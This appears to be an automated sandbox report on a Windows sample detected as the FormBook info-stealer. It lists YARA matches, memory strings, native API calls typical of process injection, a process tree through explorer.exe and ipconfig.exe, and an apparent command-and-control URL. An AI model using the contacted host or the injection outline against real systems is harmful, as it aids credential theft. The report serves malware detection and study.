          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmpString found in binary or memory: http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A9B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A99A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8280 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8300 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB8222 NtCreateFile,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0040102E
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B8FB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00408C6C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00408C70
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B57A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402D88
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041C58A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B220A8
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B090
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B11002
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB8FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA8C6C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA8C70
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBC58A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2D88
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB57A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 035BB150 appears 35 times
          Source: v8kZUFgdD4.exe, 00000000.00000003.333171421.0000000002486000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.389800702.000000000060E000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.390529849.0000000000CDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@16/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: v8kZUFgdD4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: v8kZUFgdD4.exeVirustotal: Detection: 38%
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeFile read: C:\Users\user\Desktop\v8kZUFgdD4.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
